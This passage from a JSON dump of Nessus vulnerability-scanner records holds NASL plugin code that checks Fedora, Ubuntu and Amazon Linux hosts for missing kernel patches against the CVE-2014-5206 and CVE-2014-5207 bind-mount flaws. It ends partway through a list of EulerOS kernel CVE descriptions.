19 : kernel-3.14.17-100.fc19 (2014-9449)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "modified": "2014-08-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-9449.NASL", "href": "https://www.tenable.com/plugins/nessus/77269", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9449.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77269);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\");\n script_bugtraq_id(69214, 69216);\n script_xref(name:\"FEDORA\", value:\"2014-9449\");\n\n script_name(english:\"Fedora 19 : kernel-3.14.17-100.fc19 (2014-9449)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 3.14.17 stable update contains a number of important fixes across\nthe tree. Fix CVE-2014-5206, CVE-2014-5207: ro bind mount bypass with\nnamespaces The 3.14.16 stable update contains a number of important\nfixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1129662\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136869.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7d580f64\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"kernel-3.14.17-100.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:27:41", "description": "Eric W. Biederman discovered a flaw with the mediation of mount flags\nin the Linux kernel's user namespace subsystem. An unprivileged user\ncould exploit this flaw to by-pass mount restrictions, and potentially\ngain administrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounds when used\nwith user namespaces. An unprivileged local user could exploit this\nflaw to gain full write privileges to a mount that should be read\nonly. (CVE-2014-5206).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2014-08-18T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-2317-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "modified": "2014-08-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2317-1.NASL", "href": "https://www.tenable.com/plugins/nessus/77236", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2317-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77236);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\");\n script_bugtraq_id(69214, 69216);\n script_xref(name:\"USN\", value:\"2317-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-2317-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Eric W. Biederman discovered a flaw with the mediation of mount flags\nin the Linux kernel's user namespace subsystem. An unprivileged user\ncould exploit this flaw to by-pass mount restrictions, and potentially\ngain administrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounds when used\nwith user namespaces. An unprivileged local user could exploit this\nflaw to gain full write privileges to a mount that should be read\nonly. (CVE-2014-5206).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2317-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic and / or\nlinux-image-3.13-generic-lpae packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-5206\", \"CVE-2014-5207\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2317-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-34-generic\", pkgver:\"3.13.0-34.60~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-34-generic-lpae\", pkgver:\"3.13.0-34.60~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:27:41", "description": "Eric W. Biederman discovered a flaw with the mediation of mount flags\nin the Linux kernel's user namespace subsystem. An unprivileged user\ncould exploit this flaw to by-pass mount restrictions, and potentially\ngain administrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounds when used\nwith user namespaces. An unprivileged local user could exploit this\nflaw to gain full write privileges to a mount that should be read\nonly. (CVE-2014-5206).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2014-08-18T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerabilities (USN-2318-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "modified": "2014-08-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2318-1.NASL", "href": "https://www.tenable.com/plugins/nessus/77237", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2318-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77237);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\");\n script_bugtraq_id(69214, 69216);\n script_xref(name:\"USN\", value:\"2318-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerabilities (USN-2318-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Eric W. Biederman discovered a flaw with the mediation of mount flags\nin the Linux kernel's user namespace subsystem. An unprivileged user\ncould exploit this flaw to by-pass mount restrictions, and potentially\ngain administrative privileges. (CVE-2014-5207)\n\nKenton Varda discovered a flaw with read-only bind mounds when used\nwith user namespaces. An unprivileged local user could exploit this\nflaw to gain full write privileges to a mount that should be read\nonly. (CVE-2014-5206).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2318-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic,\nlinux-image-3.13-generic-lpae and / or linux-image-3.13-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-5206\", \"CVE-2014-5207\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2318-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-34-generic\", pkgver:\"3.13.0-34.60\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-34-generic-lpae\", pkgver:\"3.13.0-34.60\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-34-lowlatency\", pkgver:\"3.13.0-34.60\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:18:55", "description": "fs/namespace.c in the Linux kernel through 3.16.1 does not properly\nrestrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\nMNT_ATIME_MASK during a remount of a bind mount, which allows local\nusers to gain privileges, interfere with backups and auditing on\nsystems that had atime enabled, or cause a denial of service\n(excessive filesystem updating) on systems that had atime disabled via\na 'mount -o remount' command within a user namespace.\n\nThe do_remount function in fs/namespace.c in the Linux kernel through\n3.16.1 does not maintain the MNT_LOCK_READONLY bit across a remount of\na bind mount, which allows local users to bypass an intended read-only\nrestriction and defeat certain sandbox protection mechanisms via a\n'mount -o remount' command within a user namespace.", "edition": 24, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : kernel (ALAS-2014-417)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5206", "CVE-2014-5207"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-doc", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:perf-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:kernel-headers", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-417.NASL", "href": "https://www.tenable.com/plugins/nessus/78360", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-417.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78360);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-5206\", \"CVE-2014-5207\");\n script_xref(name:\"ALAS\", value:\"2014-417\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2014-417)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"fs/namespace.c in the Linux kernel through 3.16.1 does not properly\nrestrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\nMNT_ATIME_MASK during a remount of a bind mount, which allows local\nusers to gain privileges, interfere with backups and auditing on\nsystems that had atime enabled, or cause a denial of service\n(excessive filesystem updating) on systems that had atime disabled via\na 'mount -o remount' command within a user namespace.\n\nThe do_remount function in fs/namespace.c in the Linux kernel through\n3.16.1 does not maintain the MNT_LOCK_READONLY bit across a remount of\na bind mount, which allows local users to bypass an intended read-only\nrestriction and defeat certain sandbox protection mechanisms via a\n'mount -o remount' command within a user namespace.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-417.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Run 'yum update kernel' to update your system. You will need to reboot\nyour system in order for the new kernel to be running.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-devel-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-3.14.19-17.43.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-3.14.19-17.43.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:56:07", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - In the ea_get function in fs/jfs/xattr.c in the Linux\n kernel through 4.17.1, a memory corruption bug in JFS\n can be triggered by calling setxattr twice with two\n different extended attribute names on the same file.\n This vulnerability can be triggered by an unprivileged\n user with the ability to create files and execute\n programs. A kmalloc call is incorrect, leading to\n slab-out-of-bounds in jfs_xattr.(CVE-2018-12233i1/4%0\n\n - The spectre_v2_select_mitigation function in\n arch/x86/kernel/cpu/bugs.c in the Linux kernel before\n 4.18.1 does not always fill RSB upon a context switch,\n which makes it easier for attackers to conduct\n userspace-userspace spectreRSB\n attacks.(CVE-2018-15572i1/4%0\n\n - Race condition in the queue_delete function in\n sound/core/seq/seq_queue.c in the Linux kernel before\n 4.4.1 allows local users to cause a denial of service\n (use-after-free and system crash) by making an ioctl\n call at a certain time.(CVE-2016-2544i1/4%0\n\n - A flaw was found in the Linux kernel's implementation\n of BPF in which systems can application can overflow a\n 32 bit refcount in both program and map refcount. This\n refcount can wrap and end up a user after\n free.(CVE-2016-4558i1/4%0\n\n - Interpretation conflict in\n drivers/md/dm-snap-persistent.c in the Linux kernel\n through 3.11.6 allows remote authenticated users to\n obtain sensitive information or modify data via a\n crafted mapping to a snapshot block\n device.(CVE-2013-4299i1/4%0\n\n - The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel through 4.13.11 allows local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16537i1/4%0\n\n - A vulnerability in the handling of Transactional Memory\n on powerpc systems was found. An unprivileged local\n user can crash the kernel by starting a transaction,\n suspending it, and then calling any of the exec() class\n system calls.(CVE-2016-5828i1/4%0\n\n - A cross-boundary flaw was discovered in the Linux\n kernel software raid driver. The driver accessed a\n disabled bitmap where only the first byte of the buffer\n was initialized to zero. This meant that the rest of\n the request (up to 4095 bytes) was left and copied into\n user space. An attacker could use this flaw to read\n private information from user space that would not\n otherwise have been accessible.(CVE-2015-5697i1/4%0\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643i1/4%0\n\n - Race condition in the sclp_ctl_ioctl_sccb function in\n drivers/s390/char/sclp_ctl.c in the Linux kernel before\n 4.6 allows local users to obtain sensitive information\n from kernel memory by changing a certain length value,\n aka a 'double fetch' vulnerability.(CVE-2016-6130i1/4%0\n\n - drivers/net/usb/asix_devices.c in the Linux kernel\n through 4.13.11 allows local users to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact via a crafted\n USB device.(CVE-2017-16647i1/4%0\n\n - A flaw was found in the Linux kernel which could cause\n a kernel panic when restoring machine specific\n registers on the PowerPC platform. Incorrect\n transactional memory state registers could\n inadvertently change the call path on return from\n userspace and cause the kernel to enter an unknown\n state and 